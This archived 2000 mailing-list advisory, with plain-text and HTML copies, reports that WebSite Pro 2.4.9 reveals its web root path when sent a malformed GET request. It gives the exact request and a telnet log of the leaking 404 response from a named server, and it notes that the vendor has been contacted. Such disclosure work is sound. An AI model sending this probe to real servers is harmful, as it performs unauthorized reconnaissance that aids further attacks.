This is a multi-part message in MIME format. ------=_NextPart_000_00E7_01BF5E14.DAB4C4A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I got a tip from Noah Rathaus about WebSite Pro latest version(2.4.9). = He mentioned a server where WebSite Pro. 2.4.9 is run. I discovered, that also the latest version is vulnerable to the bug of = revealing webdirectories. In the new version there must be made a change to retrieve the = directoryname. When you connect to a server send the command line: GET /HTTP1.0 \ You have now to add a space before the last backspace of the = commandline. That makes the server respond with a "404" error and and prints the = directoryname. Here is the part from the logfile of Windows Telnet Client: website.oreilly.com: ----------------------------------------------------start----------------= --------------------------------------- GET /HTTP1.0 \ =20 HTTP/1.0 404 Not Found Date: Thu, 13 Jan 2000 20:47:12 GMT Server: WebSitePro/2.4.9 Accept-ranges: bytes Content-type: text/html Content-length: 216 =20 <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY = bgcolor=3D"White"><H2>404 Not Found</H2> The requested URL was not found on this = server:<P><CODE>/HTTP1.0<P>(c :\1Web\docs\website\HTTP1.0)</CODE><P> </BODY></HTML> --------------------------------------------------end--------------------= ------------------------------------ Here it shows us the directory "c:\1Web\docs\website\". Status: Vendor contacted and informed about the bug. Expecting statement about fix. ------------------------------- Lark Lizerman Contact: Lark82at_private or webmasterat_private ------------------------------- ------=_NextPart_000_00E7_01BF5E14.DAB4C4A0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META content=3D"text/html; charset=3Diso-8859-1" = http-equiv=3DContent-Type> <META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#fffff0> <DIV><FONT face=3DArial size=3D2>I got a tip from Noah Rathaus about = WebSite Pro=20 latest version(2.4.9). He mentioned a server</FONT></DIV> <DIV><FONT face=3DArial size=3D2>where WebSite Pro. 2.4.9 is = run.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>I discovered, that also the latest = version is=20 vulnerable to the bug of revealing webdirectories.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>In the new version there must be made a = change to=20 retrieve the directoryname.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>When you connect to a server send the = command=20 line:</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>GET /HTTP1.0 \</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>You have now to add a space before the = last=20 backspace of the commandline.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>That makes the server respond with a = "404" error=20 and and prints the directoryname.</FONT></DIV> <DIV> </DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Here is the part from the logfile of = Windows Telnet=20 Client:</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>website.oreilly.com:</FONT></DIV> <DIV><FONT face=3DArial=20 size=3D2>----------------------------------------------------start-------= ------------------------------------------------</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>GET /HTTP1.0 \<BR> <BR>HTTP/1.0 = 404 Not=20 Found<BR>Date: Thu, 13 Jan 2000 20:47:12 GMT<BR>Server:=20 WebSitePro/2.4.9<BR>Accept-ranges: bytes<BR>Content-type:=20 text/html<BR>Content-length:=20 216<BR> <BR><HTML><HEAD><TITLE>404 Not=20 Found</TITLE></HEAD><BR> &= nbsp; &n= bsp; &nb= sp; &nbs= p; =20 <BODY bgcolor=3D"White"><H2>404=20 Not<BR> Found</H2><BR> &nbs= p; =20 The requested URL was not found on this=20 server:<P><CODE>/HTTP1.0<P>(c<BR>:\1Web\docs\website\HT= TP1.0)</CODE><P><BR>  = ; = &= nbsp; =20 </BODY></HTML><BR>-------------------------------------------= -------end--------------------------------------------------------</FONT>= </DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Here it shows us the directory=20 "c:\1Web\docs\website\".</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Status: Vendor contacted and informed = about the=20 bug.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>Expecting statement about = fix.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>-------------------------------<BR>Lark = Lizerman</FONT></DIV> <DIV><FONT face=3DArial size=3D2>Contact:</FONT></DIV> <DIV><FONT face=3DArial size=3D2><A=20 href=3D"mailto:Lark82at_private">Lark82at_private</A></FONT></DIV> <DIV><FONT face=3DArial size=3D2>or<BR><A=20 href=3D"mailto:webmasterat_private">webmasterat_private</A><BR>--------= -----------------------</FONT></DIV></BODY></HTML> ------=_NextPart_000_00E7_01BF5E14.DAB4C4A0--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:28:05 PDT